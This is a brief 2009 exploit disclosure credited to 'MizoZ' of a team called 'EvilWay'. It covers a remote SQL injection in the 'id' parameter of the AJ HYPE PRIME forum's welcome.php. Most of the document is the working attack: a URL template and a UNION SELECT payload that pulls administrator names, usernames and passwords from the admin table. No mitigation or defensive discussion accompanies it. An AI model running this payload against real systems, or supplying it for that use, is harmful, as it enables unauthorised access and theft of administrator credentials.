/*

AJ HYPE PRIME (id) Remote SQL Injection Vulnerability

Discovered by : MizoZ
Contact : mizoz@9.cn <mizozx@gmail.com>
Team : EvilWay

Date : July 29 2009

Greetings : Moudi , Zuka, All friends

*/

SQL Injection welcome.php (GET : id) :
[HOST]/[PATH]/forum/welcome.php?id=[SQL CODE]

SQL CODE :
null+union+select+1,2,concat(admin_name,0x3a,username,0x3a,admin_password)+from+admin--